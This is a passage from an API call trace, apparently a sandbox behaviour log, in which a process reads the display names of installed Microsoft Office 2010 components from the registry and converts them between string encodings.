lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.620] strlen (_Str="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.PROPLUSR_{1779650B-2E44-4A19-8DF6-3866D645764A}") returned 0x5f [0047.620] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.620] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x22, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.VISIOR_{1779650B-2E44-4A19-8DF6-3866D645764A}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.620] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.VISIOR_{1779650B-2E44-4A19-8DF6-3866D645764A}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.620] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.620] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.620] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2620ff0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.620] strlen (_Str="{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.VISIOR_{1779650B-2E44-4A19-8DF6-3866D645764A}") returned 0x5d [0047.620] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.620] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x23, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-002C-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.620] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-002C-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.620] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x52) returned 0x0 [0047.620] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x52 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x52) returned 0x0 [0047.620] wcslen (_String="Microsoft Office Proofing (English) 2010") returned 0x28 [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proofing (English) 2010", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0047.620] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Proofing (English) 2010", cchWideChar=40, lpMultiByteStr=0x2621028, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Proofing (English) 2010", lpUsedDefaultChar=0x0) returned 40 [0047.620] strlen (_Str="{90140000-002C-0409-1000-0000000FF1CE}") returned 0x26 [0047.620] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.620] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x24, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-002C-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.620] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-002C-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.621] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2621060, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.621] strlen (_Str="{90140000-002C-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}") returned 0x5f [0047.621] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.621] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x25, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-002C-0409-1000-0000000FF1CE}_Office14.VISIOR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.621] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-002C-0409-1000-0000000FF1CE}_Office14.VISIOR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.621] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2621098, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.621] strlen (_Str="{90140000-002C-0409-1000-0000000FF1CE}_Office14.VISIOR_{270CA0B9-9881-44DB-BC3B-37C7E66A044A}") returned 0x5d [0047.621] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.621] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x26, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0000-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.621] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0000-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x5e) returned 0x0 [0047.621] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2626cb8, lpcbData=0x59ffd3c*=0x5e | out: lpType=0x0, lpData=0x2626cb8*=0x4d, lpcbData=0x59ffd3c*=0x5e) returned 0x0 [0047.621] wcslen (_String="Microsoft Office Office 32-bit Components 2010") returned 0x2e [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Office 32-bit Components 2010", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0047.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Office 32-bit Components 2010", cchWideChar=46, lpMultiByteStr=0x26210d0, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Office 32-bit Components 2010", lpUsedDefaultChar=0x0) returned 46 [0047.621] strlen (_Str="{90140000-0043-0000-1000-0000000FF1CE}") returned 0x26 [0047.622] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.622] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x27, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.622] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.622] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2621108, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.622] strlen (_Str="{90140000-0043-0000-1000-0000000FF1CE}_Office14.PROPLUSR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}") returned 0x5f [0047.622] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.622] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x28, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0000-1000-0000000FF1CE}_Office14.VISIOR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.622] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0000-1000-0000000FF1CE}_Office14.VISIOR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.622] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2621140, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.622] strlen (_Str="{90140000-0043-0000-1000-0000000FF1CE}_Office14.VISIOR_{E8B6D35B-0B6F-4DCE-9493-859BF3809A7F}") returned 0x5d [0047.622] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.622] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x29, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.622] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x64) returned 0x0 [0047.622] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2627918, lpcbData=0x59ffd3c*=0x64 | out: lpType=0x0, lpData=0x2627918*=0x4d, lpcbData=0x59ffd3c*=0x64) returned 0x0 [0047.622] wcslen (_String="Microsoft Office Shared 32-bit MUI (English) 2010") returned 0x31 [0047.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Shared 32-bit MUI (English) 2010", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0047.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Shared 32-bit MUI (English) 2010", cchWideChar=49, lpMultiByteStr=0x262bdf8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Shared 32-bit MUI (English) 2010", lpUsedDefaultChar=0x0) returned 49 [0047.623] strlen (_Str="{90140000-0043-0409-1000-0000000FF1CE}") returned 0x26 [0047.623] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.623] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2a, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.623] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.623] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.623] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.623] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x2621178, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.623] strlen (_Str="{90140000-0043-0409-1000-0000000FF1CE}_Office14.PROPLUSR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}") returned 0x5f [0047.623] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.623] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2b, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0043-0409-1000-0000000FF1CE}_Office14.VISIOR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.623] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0043-0409-1000-0000000FF1CE}_Office14.VISIOR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.623] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.623] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.623] wcslen (_String="Microsoft Office 2010 Service Pack 1 (SP1)") returned 0x2a [0047.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0047.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Service Pack 1 (SP1)", cchWideChar=42, lpMultiByteStr=0x26211b0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office 2010 Service Pack 1 (SP1)", lpUsedDefaultChar=0x0) returned 42 [0047.623] strlen (_Str="{90140000-0043-0409-1000-0000000FF1CE}_Office14.VISIOR_{FCD1C311-8B02-4DBD-BA46-1079C629577E}") returned 0x5d [0047.624] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.624] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2c, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0044-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.624] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0044-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x5a) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2626e58, lpcbData=0x59ffd3c*=0x5a | out: lpType=0x0, lpData=0x2626e58*=0x4d, lpcbData=0x59ffd3c*=0x5a) returned 0x0 [0047.624] wcslen (_String="Microsoft Office InfoPath MUI (English) 2010") returned 0x2c [0047.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office InfoPath MUI (English) 2010", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0047.624] strlen (_Str="{90140000-0044-0409-1000-0000000FF1CE}") returned 0x26 [0047.624] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.624] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2d, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0054-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.624] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0054-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x54 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x54) returned 0x0 [0047.624] wcslen (_String="Microsoft Office Visio MUI (English) 2010") returned 0x29 [0047.624] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Visio MUI (English) 2010", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0047.624] strlen (_Str="{90140000-0054-0409-1000-0000000FF1CE}") returned 0x26 [0047.624] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.624] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2e, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0054-0409-1000-0000000FF1CE}_Office14.VISIOR_{7DC2B20B-31B9-4C7C-B8DC-8492A9A3095E}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.624] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0054-0409-1000-0000000FF1CE}_Office14.VISIOR_{7DC2B20B-31B9-4C7C-B8DC-8492A9A3095E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x72) returned 0x0 [0047.624] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2623928, lpcbData=0x59ffd3c*=0x72 | out: lpType=0x0, lpData=0x2623928*=0x4d, lpcbData=0x59ffd3c*=0x72) returned 0x0 [0047.624] wcslen (_String="Microsoft Office 2010 Language Pack Service Pack 1 (SP1)") returned 0x38 [0047.625] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office 2010 Language Pack Service Pack 1 (SP1)", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0047.625] strlen (_Str="{90140000-0054-0409-1000-0000000FF1CE}_Office14.VISIOR_{7DC2B20B-31B9-4C7C-B8DC-8492A9A3095E}") returned 0x5d [0047.625] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.625] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2f, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-006E-0409-1000-0000000FF1CE}", 